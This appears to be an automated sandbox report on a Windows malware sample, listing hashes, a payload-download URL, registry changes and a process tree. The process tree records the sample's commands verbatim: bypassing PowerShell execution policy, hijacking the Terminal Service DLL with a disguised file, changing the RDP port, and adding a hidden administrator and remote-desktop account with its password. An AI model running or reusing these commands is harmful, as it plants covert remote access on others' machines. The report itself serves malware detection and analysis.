Analysis
-
max time kernel
110s -
max time network
120s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
05-12-2021 07:50
Static task
static1
Behavioral task
behavioral1
Sample
f616975d69da372f403d58ba955dc510.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
f616975d69da372f403d58ba955dc510.exe
Resource
win10-en-20211104
General
-
Target
f616975d69da372f403d58ba955dc510.exe
-
Size
4.6MB
-
MD5
f616975d69da372f403d58ba955dc510
-
SHA1
e22fcb3ec811cba8d74d4f897d495f21e8c88224
-
SHA256
65f47cd450bd96cba40e838cb0355638a1d43b3ac51d3d6e97a469d5425a7874
-
SHA512
2be545ed1a330f76ff21e3f8406b4982b86a432065264fd88008ab762bf2fafb0f892cbee2b395cdd62c6be98ce02868223331bf1f3e9402cde6f366ca8c49e5
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 29 2420 powershell.exe 31 2420 powershell.exe 32 2420 powershell.exe 33 2420 powershell.exe 35 2420 powershell.exe 37 2420 powershell.exe 39 2420 powershell.exe 41 2420 powershell.exe 43 2420 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 2148 2148 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zeljy0yw.ztl.ps1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE6EA.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_tzsnjt1h.4qc.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE63A.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE689.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE69A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIE6D9.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = d17a577ee8d1d701 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\PMDisplayName = "Local intranet [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 32 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 33 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 35 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3952 powershell.exe 3952 powershell.exe 3952 powershell.exe 3440 powershell.exe 3440 powershell.exe 3440 powershell.exe 1524 powershell.exe 1524 powershell.exe 1524 powershell.exe 3952 powershell.exe 3952 powershell.exe 3952 powershell.exe 2420 powershell.exe 2420 powershell.exe 2420 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 632 632 -
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes:
powershell.exepowershell.exepowershell.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 3952 powershell.exe Token: SeDebugPrivilege 3440 powershell.exe Token: SeIncreaseQuotaPrivilege 3440 powershell.exe Token: SeSecurityPrivilege 3440 powershell.exe Token: SeTakeOwnershipPrivilege 3440 powershell.exe Token: SeLoadDriverPrivilege 3440 powershell.exe Token: SeSystemProfilePrivilege 3440 powershell.exe Token: SeSystemtimePrivilege 3440 powershell.exe Token: SeProfSingleProcessPrivilege 3440 powershell.exe Token: SeIncBasePriorityPrivilege 3440 powershell.exe Token: SeCreatePagefilePrivilege 3440 powershell.exe Token: SeBackupPrivilege 3440 powershell.exe Token: SeRestorePrivilege 3440 powershell.exe Token: SeShutdownPrivilege 3440 powershell.exe Token: SeDebugPrivilege 3440 powershell.exe Token: SeSystemEnvironmentPrivilege 3440 powershell.exe Token: SeRemoteShutdownPrivilege 3440 powershell.exe Token: SeUndockPrivilege 3440 powershell.exe Token: SeManageVolumePrivilege 3440 powershell.exe Token: 33 3440 powershell.exe Token: 34 3440 powershell.exe Token: 35 3440 powershell.exe Token: 36 3440 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeIncreaseQuotaPrivilege 1524 powershell.exe Token: SeSecurityPrivilege 1524 powershell.exe Token: SeTakeOwnershipPrivilege 1524 powershell.exe Token: SeLoadDriverPrivilege 1524 powershell.exe Token: SeSystemProfilePrivilege 1524 powershell.exe Token: SeSystemtimePrivilege 1524 powershell.exe Token: SeProfSingleProcessPrivilege 1524 powershell.exe Token: SeIncBasePriorityPrivilege 1524 powershell.exe Token: SeCreatePagefilePrivilege 1524 powershell.exe Token: SeBackupPrivilege 1524 powershell.exe Token: SeRestorePrivilege 1524 powershell.exe Token: SeShutdownPrivilege 1524 powershell.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeSystemEnvironmentPrivilege 1524 powershell.exe Token: SeRemoteShutdownPrivilege 1524 powershell.exe Token: SeUndockPrivilege 1524 powershell.exe Token: SeManageVolumePrivilege 1524 powershell.exe Token: 33 1524 powershell.exe Token: 34 1524 powershell.exe Token: 35 1524 powershell.exe Token: 36 1524 powershell.exe Token: SeAssignPrimaryTokenPrivilege 3144 WMIC.exe Token: SeIncreaseQuotaPrivilege 3144 WMIC.exe Token: SeAuditPrivilege 3144 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 3144 WMIC.exe Token: SeIncreaseQuotaPrivilege 3144 WMIC.exe Token: SeAuditPrivilege 3144 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2084 WMIC.exe Token: SeIncreaseQuotaPrivilege 2084 WMIC.exe Token: SeAuditPrivilege 2084 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 2084 WMIC.exe Token: SeIncreaseQuotaPrivilege 2084 WMIC.exe Token: SeAuditPrivilege 2084 WMIC.exe Token: SeDebugPrivilege 2420 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
f616975d69da372f403d58ba955dc510.exepowershell.execsc.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exedescription pid process target process PID 3460 wrote to memory of 3952 3460 f616975d69da372f403d58ba955dc510.exe powershell.exe PID 3460 wrote to memory of 3952 3460 f616975d69da372f403d58ba955dc510.exe powershell.exe PID 3952 wrote to memory of 2568 3952 powershell.exe csc.exe PID 3952 wrote to memory of 2568 3952 powershell.exe csc.exe PID 2568 wrote to memory of 1064 2568 csc.exe cvtres.exe PID 2568 wrote to memory of 1064 2568 csc.exe cvtres.exe PID 3952 wrote to memory of 712 3952 powershell.exe csc.exe PID 3952 wrote to memory of 712 3952 powershell.exe csc.exe PID 712 wrote to memory of 1516 712 csc.exe cvtres.exe PID 712 wrote to memory of 1516 712 csc.exe cvtres.exe PID 3952 wrote to memory of 3440 3952 powershell.exe powershell.exe PID 3952 wrote to memory of 3440 3952 powershell.exe powershell.exe PID 3952 wrote to memory of 1524 3952 powershell.exe powershell.exe PID 3952 wrote to memory of 1524 3952 powershell.exe powershell.exe PID 3952 wrote to memory of 1532 3952 powershell.exe powershell.exe PID 3952 wrote to memory of 1532 3952 powershell.exe powershell.exe PID 3952 wrote to memory of 724 3952 powershell.exe reg.exe PID 3952 wrote to memory of 724 3952 powershell.exe reg.exe PID 3952 wrote to memory of 3672 3952 powershell.exe reg.exe PID 3952 wrote to memory of 3672 3952 powershell.exe reg.exe PID 3952 wrote to memory of 1800 3952 powershell.exe reg.exe PID 3952 wrote to memory of 1800 3952 powershell.exe reg.exe PID 3952 wrote to memory of 400 3952 powershell.exe net.exe PID 3952 wrote to memory of 400 3952 powershell.exe net.exe PID 400 wrote to memory of 2064 400 net.exe net1.exe PID 400 wrote to memory of 2064 400 net.exe net1.exe PID 3952 wrote to memory of 2256 3952 powershell.exe cmd.exe PID 3952 wrote to memory of 2256 3952 powershell.exe cmd.exe PID 2256 wrote to memory of 2448 2256 cmd.exe cmd.exe PID 2256 wrote to memory of 2448 2256 cmd.exe cmd.exe PID 2448 wrote to memory of 3696 2448 cmd.exe net.exe PID 2448 wrote to memory of 3696 2448 cmd.exe net.exe PID 3696 wrote to memory of 3056 3696 net.exe net1.exe PID 3696 wrote to memory of 3056 3696 net.exe net1.exe PID 3952 wrote to memory of 3500 3952 powershell.exe cmd.exe PID 3952 wrote to memory of 3500 3952 powershell.exe cmd.exe PID 3500 wrote to memory of 1976 3500 cmd.exe cmd.exe PID 3500 wrote to memory of 1976 3500 cmd.exe cmd.exe PID 1976 wrote to memory of 1244 1976 cmd.exe net.exe PID 1976 wrote to memory of 1244 1976 cmd.exe net.exe PID 1244 wrote to memory of 3780 1244 net.exe net1.exe PID 1244 wrote to memory of 3780 1244 net.exe net1.exe PID 1944 wrote to memory of 3152 1944 cmd.exe net.exe PID 1944 wrote to memory of 3152 1944 cmd.exe net.exe PID 3152 wrote to memory of 2180 3152 net.exe net1.exe PID 3152 wrote to memory of 2180 3152 net.exe net1.exe PID 2948 wrote to memory of 2212 2948 cmd.exe net.exe PID 2948 wrote to memory of 2212 2948 cmd.exe net.exe PID 2212 wrote to memory of 2188 2212 net.exe net1.exe PID 2212 wrote to memory of 2188 2212 net.exe net1.exe PID 2244 wrote to memory of 4008 2244 cmd.exe net.exe PID 2244 wrote to memory of 4008 2244 cmd.exe net.exe PID 4008 wrote to memory of 352 4008 net.exe net1.exe PID 4008 wrote to memory of 352 4008 net.exe net1.exe PID 976 wrote to memory of 656 976 cmd.exe net.exe PID 976 wrote to memory of 656 976 cmd.exe net.exe PID 656 wrote to memory of 2540 656 net.exe net1.exe PID 656 wrote to memory of 2540 656 net.exe net1.exe PID 2264 wrote to memory of 696 2264 cmd.exe net.exe PID 2264 wrote to memory of 696 2264 cmd.exe net.exe PID 696 wrote to memory of 4068 696 net.exe net1.exe PID 696 wrote to memory of 4068 696 net.exe net1.exe PID 3788 wrote to memory of 1924 3788 cmd.exe net.exe PID 3788 wrote to memory of 1924 3788 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f616975d69da372f403d58ba955dc510.exe"C:\Users\Admin\AppData\Local\Temp\f616975d69da372f403d58ba955dc510.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ysa2i5ni\ysa2i5ni.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA78B.tmp" "c:\Users\Admin\AppData\Local\Temp\ysa2i5ni\CSC27CACF1B9A6548F784A5D2794A43D262.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tcsoktj1\tcsoktj1.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD77.tmp" "c:\Users\Admin\AppData\Local\Temp\tcsoktj1\CSC2D2376043F0E43B4AAFAFCE07CD4643.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc iIAQ5Y1o /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc iIAQ5Y1o /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc iIAQ5Y1o /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" LUCNJVHX$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc iIAQ5Y1o1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc iIAQ5Y1o2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc iIAQ5Y1o3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Suspicious use of AdjustPrivilegeToken
-
